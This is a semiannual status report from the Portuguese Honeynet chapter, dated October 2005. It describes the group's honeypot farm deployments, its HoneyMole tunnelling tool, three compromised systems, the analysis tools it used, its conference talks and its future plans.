Report:October-2005
From Honeynet-PT
Contents |
DEPLOYEMENTS
Current technologies deployed.
In the last six months we were running one Gen III Honeypot Farm, having HoneyMole as the tool to transport all the network traffic from the remote positions to our farm. HoneyMole is the tool that we have presented as prototype in our last report with the name Kangaroo.
Our honeypots were running Linux, Windows XP, Solaris 10 SPARC and OpenSolaris, all configured as servers running in four different ISP's and companies.
MWcollect was also deployed in order to start doing some statistics about malware activity on different ISP networks.
Lessons learned from the technology, what we like about it.
Roo is an excellent toolkit, very handy and usefull.
HoneyMole has proved to be a stable, reliable and flexible tool, to transparently and in a secure way transport all the network traffic to the Honeypot Farm.
Honeypots Farms are extremely powerful and useful technology to gather information from different origins, and we have proved that they are very easy to configure/manage with the available tools from the Honeynet Project.
Lessons learned from the technology, what is lacking, what we would like to see improved.
Probably better MySQL Sebek database design in order to speed up SQL queries and prepare it to be more appropriate to gather data in Honeypot Farms deployments.
FINDINGS
Number and type of systems compromised during six month period.
Three systems were compromised, one Linux and two Windows.
Highlight any unique findings, attacks, tools, or methods.
For the first time two of the systems were attacked via other portuguese IP addresses. All of the attacks were known, so nothing new to report.
Any trends seen in the past six months.
Lot of activity in the Windows XP systems. UDP ports used were 1028, 1029 and 1030, and also activity (scanning) increased on port 22 of all systems.
Document data analysis tools and methods being used.
Walleye is very useful to follow the steps of the attackers. Ethereal still is the best tool for network traffic analysis. Scripts to send SMS alerts in case of any successful compromise.
For data analysis what tools work well, and what still needs to be developed.
Roo is very nice but still needs some stability improvements.
MISC ACTIVITIES
Presenting at conferences.
We gave a presentation at SANS Institute in Portugal and another at the 5th OpenBSD .PT Meeting.
Developing, testing or releasing code.
HoneyMole, our primary transparent tunnel tool. It doesn't need any kernel patch or module to work.
Publication of papers.
We have sent a paper to SINO 2005 conference (1st National Security Conference).
Involvement in SotM challenges.
None.
Other.
None.
ORGANIZATIONAL
Changes in your structure of your organization.
None.
LESSONS LEARNED
What positive things can you share with the community, so they can replicate your success.
We've started using Trac (http://projects.edgewall.com/trac/) internally for code development, very easy to use and efficient. We cannot live without HoneyMole when working with Honeypot Farms. It is so easy to tunnel all the traffic to a central repository.
What mistakes can you share with the community, so they don't make the same mistakes.
None.
FUTURE GOALS
Plans/Goals for next six months.
We are going to continue HoneyMole development and investigating Honeypot Farms technology, in order to think about new approaches.
Now that HoneyMole is stable, we are going to deploy darknet architectures using it, or faking enterprise intranets.
We are also thinking about deploying honeypots running Asterisk because we are hearing rumors about attacks going on that field.
